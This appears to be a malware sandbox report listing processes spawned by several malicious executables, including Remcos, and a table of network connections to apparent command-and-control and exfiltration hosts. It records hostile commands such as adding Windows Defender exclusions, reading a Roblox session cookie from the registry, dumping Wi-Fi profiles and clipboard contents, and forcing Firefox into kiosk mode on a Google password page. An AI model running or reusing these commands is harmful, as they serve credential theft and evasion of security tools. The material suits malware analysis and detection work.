C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
"C:\Users\Admin\AppData\Local\complacence\outvaunts.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8084 -ip 8084
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8084 -s 84
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe" & rd /s /q "C:\ProgramData\D2NGDJWL6P8Q" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1864 -prefMapHandle 1852 -prefsLen 23680 -prefMapSize 244710 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58c94699-cbfe-4420-b41a-8a1606560f26} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" gpu
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2740 -ip 2740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1964
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 24600 -prefMapSize 244710 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6bb4564-91f3-4b67-9426-714b4e39a106} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" socket
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 2700 -ip 2700
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\getmac.exe
getmac
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "9504" "2052" "1984" "2056" "0" "0" "2060" "0" "0" "0" "0" "0"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 1284
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2944 -childID 1 -isForBrowser -prefsHandle 2904 -prefMapHandle 2864 -prefsLen 22652 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {734c80fc-651f-49f2-9356-25c525c14818} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 8504 -ip 8504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8504 -s 1172
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3952 -childID 2 -isForBrowser -prefsHandle 3948 -prefMapHandle 3944 -prefsLen 29090 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39901a94-73cc-4713-964f-9945c4dbfd3b} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4636 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4632 -prefMapHandle 4744 -prefsLen 29197 -prefMapSize 244710 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d33af55d-c1bc-40a8-891f-23e22f839eb2} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" utility
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -childID 3 -isForBrowser -prefsHandle 4956 -prefMapHandle 4928 -prefsLen 27132 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f87da659-a649-4ea8-9525-4e2130d98c46} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4980 -childID 4 -isForBrowser -prefsHandle 2664 -prefMapHandle 4936 -prefsLen 27132 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1514b62-5618-4e82-989e-ad69f425c8d3} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 5 -isForBrowser -prefsHandle 5196 -prefMapHandle 5108 -prefsLen 27132 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99fe053f-7586-44af-9da4-66e9de754eab} 7584 "\\.\pipe\gecko-crash-server-pipe.7584" tab
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 10132 -ip 10132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10132 -s 848
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.133.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 234.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.105:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 96.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 105.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| RU | 89.169.40.170:143 | tcp | |
| RU | 89.169.41.157:8080 | tcp | |
| RU | 213.108.19.30:445 | tcp | |
| RU | 89.169.1.23:80 | tcp | |
| RU | 89.169.20.205:49158 | tcp | |
| RU | 89.169.1.26:8081 | tcp | |
| RU | 89.169.0.127:8291 | tcp | |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 88.221.134.137:80 | e5.o.lencr.org | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.19.108.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 165.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.213.48:443 | fightlsoser.click | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.213.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | 7.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 254.238.217.23.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| DE | 101.99.92.189:8080 | tcp | |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | f0706909.xsph.ru | udp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| RU | 141.8.193.236:80 | f0706909.xsph.ru | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| GB | 193.63.58.76:9001 | tcp | |
| N/A | 127.0.0.1:53792 | tcp | |
| N/A | 127.0.0.1:53910 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 76.58.63.193.in-addr.arpa | udp |
| DE | 89.58.54.129:443 | tcp | |
| FR | 94.23.172.32:443 | tcp | |
| US | 8.8.8.8:53 | 32.172.23.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.54.58.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| US | 172.67.160.84:443 | freegeoip.app | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 84.160.67.172.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| US | 104.21.85.189:443 | ipbase.com | tcp |
| US | 8.8.8.8:53 | 189.85.21.104.in-addr.arpa | udp |
| US | 154.216.17.90:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 154.216.18.132:6868 | | tcp |
| US | 104.21.27.188:443 | awake-weaves.cyou | tcp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.27.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 172.67.207.38:443 | immureprech.biz | tcp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| US | 104.21.16.1:443 | deafeninggeh.biz | tcp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| US | 8.8.8.8:53 | 38.207.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.16.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 104.21.74.196:443 | wrathful-jammy.cyou | tcp |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.74.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.141.195:443 | sordid-snaked.cyou | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 195.141.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id71.internetid.ru | udp |
| RU | 95.213.205.83:5655 | id71.internetid.ru | tcp |
| US | 8.8.8.8:53 | 83.205.213.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| RU | 77.223.124.212:5655 | | tcp |
| US | 8.8.8.8:53 | 212.124.223.77.in-addr.arpa | udp |
| US | 20.83.148.22:80 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | ship-amongst.gl.at.ply.gg | udp |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 24.221.185.147.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | | tcp |
| US | 8.8.8.8:53 | testinghigger-42471.portmap.host | udp |
| DE | 193.161.193.99:42471 | testinghigger-42471.portmap.host | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 3.26.192.23.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | | tcp |
| US | 154.216.17.90:80 | | tcp |
| DE | 193.161.193.99:42471 | testinghigger-42471.portmap.host | tcp |
| N/A | 192.168.56.1:4782 | | tcp |
| US | 154.216.18.132:6868 | | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 154.216.18.132:6868 | | tcp |
